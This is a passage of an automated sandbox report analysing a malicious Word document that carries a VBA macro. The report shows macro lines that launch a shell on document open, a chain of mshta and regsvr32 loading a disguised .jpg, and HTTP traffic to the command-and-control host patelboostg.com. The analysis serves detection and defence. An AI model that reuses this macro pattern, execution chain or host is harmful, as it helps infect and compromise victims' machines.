Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://onedrive.live.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://osi.office.net
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://otelrules.azureedge.net
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://outlook.office.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://outlook.office.com/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://outlook.office365.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://outlook.office365.com/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://pages.store.office.com/review/query
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://powerlift.acompli.net
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://roaming.edog.
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://settings.outlook.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://staging.cortana.ai
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://tasks.office.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://webshell.suite.office.com
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://wus2.contentsync.
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownDNS traffic detected: queries for: patelboostg.com
Source: global trafficHTTP traffic detected: GET /frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob0 HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: patelboostg.comConnection: Keep-Alive

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: enjoin,12.27.2021.docOLE, VBA macro line: CreateObject("wsc" + cont1("company") + "ell").exec cont1("category") + " " + mouseVideo
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function srn1, API IWshShell3.exec("explorer i7Gigabyte.hta")
Source: ~WRF{810769F3-F410-47AD-894E-8C41E68C70EA}.tmp.1.drOLE indicator application name: unknown
Source: enjoin,12.27.2021.docOLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open
Source: ~WRF{810769F3-F410-47AD-894E-8C41E68C70EA}.tmp.1.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{810769F3-F410-47AD-894E-8C41E68C70EA}.tmp.1.drOLE indicator has summary info: false
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
Source: enjoin,12.27.2021.docOLE indicator, VBA macros: true
Source: enjoin,12.27.2021.docOLE, VBA macro line: cont1 = activedocument.builtindocumentproperties(i7computermonitor).value
Source: enjoin,12.27.2021.docReversingLabs: Detection: 44%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\explorer.exe explorer i7Gigabyte.hta
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" c:\users\public\gigabyteI7.jpg
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\explorer.exe explorer i7Gigabyte.hta
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" c:\users\public\gigabyteI7.jpg
Source: C:\Windows\SysWOW64\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: enjoin,12.27.2021.docOLE indicator, Word Document stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{560F8D37-2791-4DB1-8112-D40395CAE711} - OProcSessId.datJump to behavior
Source: classification engineClassification label: mal96.expl.evad.winDOC@8/15@1/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: enjoin,12.27.2021.docOLE document summary: title field not present or empty
Source: enjoin,12.27.2021.docOLE document summary: author field not present or empty
Source: enjoin,12.27.2021.docOLE document summary: edited time not present or 0
Source: ~WRF{810769F3-F410-47AD-894E-8C41E68C70EA}.tmp.1.drOLE document summary: title field not present or empty
Source: ~WRF{810769F3-F410-47AD-894E-8C41E68C70EA}.tmp.1.drOLE document summary: author field not present or empty
Source: ~WRF{810769F3-F410-47AD-894E-8C41E68C70EA}.tmp.1.drOLE document summary: edited time not present or 0
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: enjoin,12.27.2021.docInitial sample: OLE summary comments = ta
Source: enjoin,12.27.2021.docInitial sample: OLE document summary bytes = 26624
Source: ~WRF{810769F3-F410-47AD-894E-8C41E68C70EA}.tmp.1.drInitial sample: OLE indicators vbamacros = False
Source: enjoin,12.27.2021.docInitial sample: OLE document summary category = explorer

Data Obfuscation:

barindex
Source: C:\Windows\SysWOW64\mshta.exeCode function: 12_2_04E7C428 pushad ; ret
Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: enjoin,12.27.2021.docStream path 'Data' entropy: 7.93699752134 (max. 8.0)
Source: mshta.exe, 0000000C.00000003.308740663.000000000A3FF000.00000004.00000001.sdmp, mshta.exe, 0000000C.00000002.315823297.000000000A3FF000.00000004.00000001.sdmp, mshta.exe, 0000000C.00000003.307574031.000000000A3FF000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 0000000C.00000003.307547226.000000000A3C9000.00000004.00000001.sdmp, mshta.exe, 0000000C.00000003.308695050.000000000A3C9000.00000004.00000001.sdmp, mshta.exe, 0000000C.00000002.315723271.000000000A3C9000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWX{@
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" c:\users\public\gigabyteI7.jpg
Source: explorer.exe, 0000000B.00000002.1462442961.00000000015E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
Source: explorer.exe, 0000000B.00000002.1462442961.00000000015E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000002.1462442961.00000000015E0000.00000002.00020000.sdmpBinary or memory string: Progman
Source: explorer.exe, 0000000B.00000002.1462442961.00000000015E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting12DLL Side-Loading1Process Injection12Masquerading1OS Credential DumpingQuery Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsDLL Side-Loading1Process Injection12LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information11NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsFile and Directory Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 546767 Sample: enjoin,12.27.2021.doc Startdate: 31/12/2021 Architecture: WINDOWS Score: 96 25 Multi AV Scanner detection for submitted file 2->25 27 Sigma detected: Office product drops script at suspicious location 2->27 29 Sigma detected: Register DLL with spoofed extension 2->29 31 8 other signatures 2->31 7 WINWORD.EXE 36 38 2->7         started        10 explorer.exe 3 2->10         started        process3 file4 19 C:\Users\user\AppData\...\i7Gigabyte.hta.LNK, MS 7->19 dropped 21 C:\Users\user\...\enjoin,12.27.2021.doc.LNK, MS 7->21 dropped 12 explorer.exe 1 7->12         started        14 mshta.exe 21 10->14         started        process5 dnsIp6 23 patelboostg.com 45.67.229.54, 49742, 80 ALEXHOSTMD Moldova Republic of 14->23 17 regsvr32.exe 14->17         started        process7

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
enjoin,12.27.2021.doc44%ReversingLabsDocument-Excel.Trojan.Valyria
enjoin,12.27.2021.doc100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
patelboostg.com2%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://roaming.edog.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
